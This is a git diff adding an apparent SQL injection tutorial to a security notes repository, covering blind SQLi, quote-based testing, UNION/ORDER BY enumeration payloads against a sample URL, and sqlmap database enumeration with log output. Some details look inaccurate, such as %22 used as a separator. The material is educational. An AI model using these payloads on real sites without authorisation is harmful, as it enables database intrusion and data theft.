diff --git a/Web_Exploits/README.md b/Web_Exploits/README.md index 251f7eb..87450ec 100644 --- a/Web_Exploits/README.md +++ b/Web_Exploits/README.md @@ -1,6 +1,6 @@ # Web Exploits -[My list of common web vulnerabilits.](http://bt3gl.github.io/a-list-of-common-web-vulnerabilities.html) +[My list of common web vulnerabilities.](http://bt3gl.github.io/a-list-of-common-web-vulnerabilities.html) ## OS Command Injection diff --git a/Web_Exploits/SQLi/README.md b/Web_Exploits/SQLi/README.md index 90d2251..319e7d9 100644 --- a/Web_Exploits/SQLi/README.md +++ b/Web_Exploits/SQLi/README.md @@ -1,11 +1,11 @@ -# SQL Injections +# SQL Injections (SQLi) * A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms. * Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database. -## Examples +## The Simplest Example -* A parameter passed for a name of a user: +A parameter passed for a name of a user: ``` SELECT * FROM users WHERE @@ -21,4 +21,80 @@ So that the **WHERE** clause is always executed, which means that it will return Nowadays it is estimated that less than 5% of the websites have this vulnerability. +These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows. + +## Blind SQL Injection + +It's estimated that over 20% of the websites have this flow. + +In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true. + +Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another. + +In the example +``` +http://www.website.com/info.php?id=10 +``` +the page *info.php* is receiving the data and will have some code like: +``` +$id=$_post['id']; +``` +and an associated SQL query: +``` +QueryHere = "select * from information where code='$id'" +``` +### Common ways of Exploitation + +#### Checking for vulnerability +We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL: + +``` +http://www.website.com/info.php?id=10' +``` + +If the website returns the following error: + + You have an error in your SQL syntax... + +It means that this website is vulnerable to SQL. + +#### Find the structure of the database +To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/). + +This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns. + +* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x. + +* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to: + +``` +?id=5'%22union%22all%22select%221,2,3 +``` + +* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name: + +``` +?id=5'%22union%22all%22select%221,2,3%22from%22admin +``` +So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases): + +``` +$ ./sqlmap.py -u --dbs +(...) +[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic +[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic +[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic +[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable +[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*' +[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' +[12:59:27] [WARNING] reflective value(s) found and filtering out +[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' +[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' +[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' +(...) +``` + +From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is ```--tables ```. + +